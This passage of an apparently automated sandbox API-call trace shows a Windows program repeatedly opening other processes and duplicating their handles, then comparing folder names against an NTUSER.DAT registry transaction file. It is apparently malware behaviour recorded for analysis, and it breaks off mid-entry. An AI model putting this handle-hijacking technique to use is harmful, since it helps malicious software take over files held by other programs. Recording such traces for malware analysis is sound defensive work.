OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0164.978] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.979] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.980] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.980] CloseHandle (hObject=0x1e4) returned 1 [0164.980] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.980] CloseHandle (hObject=0x194) returned 1 [0164.980] CloseHandle (hObject=0x1e8) returned 1 [0164.980] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0164.980] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.981] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.982] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.982] CloseHandle (hObject=0x1e4) returned 1 [0164.982] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.982] CloseHandle (hObject=0x194) returned 1 [0164.982] CloseHandle (hObject=0x1e8) returned 1 [0164.982] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0164.982] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.983] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.984] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.984] CloseHandle (hObject=0x1e4) returned 1 [0164.984] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.984] CloseHandle (hObject=0x194) returned 1 [0164.984] CloseHandle (hObject=0x1e8) returned 1 [0164.984] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0164.984] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.985] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.986] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.986] CloseHandle (hObject=0x1e4) returned 1 [0164.986] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.986] CloseHandle (hObject=0x194) returned 1 [0164.987] CloseHandle (hObject=0x1e8) returned 1 [0164.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0164.987] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.988] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.988] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.988] CloseHandle (hObject=0x1e4) returned 1 [0164.988] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.989] CloseHandle (hObject=0x194) returned 1 [0164.989] CloseHandle (hObject=0x1e8) returned 1 [0164.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0164.989] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.990] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.990] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.991] CloseHandle (hObject=0x1e4) returned 1 [0164.991] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.991] CloseHandle (hObject=0x194) returned 1 [0164.991] CloseHandle (hObject=0x1e8) returned 1 [0164.991] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0164.991] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.992] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.992] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.993] CloseHandle (hObject=0x1e4) returned 1 [0164.993] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.993] CloseHandle (hObject=0x194) returned 1 [0164.993] CloseHandle (hObject=0x1e8) returned 1 [0164.993] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0164.993] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.994] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.995] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.995] CloseHandle (hObject=0x1e4) returned 1 [0164.995] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.995] CloseHandle (hObject=0x194) returned 1 [0164.995] CloseHandle (hObject=0x1e8) returned 1 [0164.995] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0164.995] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.996] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.997] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.997] CloseHandle (hObject=0x1e4) returned 1 [0164.997] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.997] CloseHandle (hObject=0x194) returned 1 [0164.997] CloseHandle (hObject=0x1e8) returned 1 [0164.998] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0164.998] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.998] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.999] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.999] CloseHandle (hObject=0x1e4) returned 1 [0165.000] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.000] CloseHandle (hObject=0x194) returned 1 [0165.000] CloseHandle (hObject=0x1e8) returned 1 [0165.000] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0165.000] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.000] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.001] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.001] CloseHandle (hObject=0x1e4) returned 1 [0165.001] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.001] CloseHandle (hObject=0x194) returned 1 [0165.001] CloseHandle (hObject=0x1e8) returned 1 [0165.002] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0165.002] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.002] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.003] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.003] CloseHandle (hObject=0x1e4) returned 1 [0165.003] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.003] CloseHandle (hObject=0x194) returned 1 [0165.003] CloseHandle (hObject=0x1e8) returned 1 [0165.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0165.003] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.004] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.005] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.005] CloseHandle (hObject=0x1e4) returned 1 [0165.005] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.005] CloseHandle (hObject=0x194) returned 1 [0165.006] CloseHandle (hObject=0x1e8) returned 1 [0165.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0165.006] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.006] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.008] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.009] CloseHandle (hObject=0x1e4) returned 1 [0165.009] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.009] CloseHandle (hObject=0x194) returned 1 [0165.009] CloseHandle (hObject=0x1e8) returned 1 [0165.009] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0165.009] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.010] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.010] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.011] CloseHandle (hObject=0x1e4) returned 1 [0165.011] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.011] CloseHandle (hObject=0x194) returned 1 [0165.011] CloseHandle (hObject=0x1e8) returned 1 [0165.011] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0165.011] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.012] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.012] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.012] CloseHandle (hObject=0x1e4) returned 1 [0165.012] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.012] CloseHandle (hObject=0x194) returned 1 [0165.013] CloseHandle (hObject=0x1e8) returned 1 [0165.013] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0165.013] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.014] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.014] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.015] CloseHandle (hObject=0x1e4) returned 1 [0165.015] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.015] CloseHandle (hObject=0x194) returned 1 [0165.015] CloseHandle (hObject=0x1e8) returned 1 [0165.015] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0165.015] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.015] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.016] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.016] CloseHandle (hObject=0x1e4) returned 1 [0165.016] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.016] CloseHandle (hObject=0x194) returned 1 [0165.017] CloseHandle (hObject=0x1e8) returned 1 [0165.017] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0165.017] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.017] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.018] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.018] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.019] CloseHandle (hObject=0x1e4) returned 1 [0165.019] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.019] CloseHandle (hObject=0x194) returned 1 [0165.019] CloseHandle (hObject=0x1e8) returned 1 [0165.019] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0165.019] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.020] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.021] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.021] CloseHandle (hObject=0x1e4) returned 1 [0165.021] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0165.021] CloseHandle (hObject=0x194) returned 1 [0165.021] CloseHandle (hObject=0x1e8) returned 1 [0165.021] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0165.021] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.022] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.023] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.023] CloseHandle (hObject=0x1e4) returned 1 [0165.023] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.023] CloseHandle (hObject=0x194) returned 1 [0165.023] CloseHandle (hObject=0x1e8) returned 1 [0165.023] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0165.023] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.024] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.025] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.025] CloseHandle (hObject=0x1e4) returned 1 [0165.025] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.025] CloseHandle (hObject=0x194) returned 1 [0165.025] CloseHandle (hObject=0x1e8) returned 1 [0165.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0165.026] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.026] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.027] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.027] CloseHandle (hObject=0x1e4) returned 1 [0165.028] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.028] CloseHandle (hObject=0x194) returned 1 [0165.028] CloseHandle (hObject=0x1e8) returned 1 [0165.028] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0165.028] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.029] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.030] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.030] CloseHandle (hObject=0x1e4) returned 1 [0165.030] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.030] CloseHandle (hObject=0x194) returned 1 [0165.030] CloseHandle (hObject=0x1e8) returned 1 [0165.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0165.030] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.031] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.032] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: 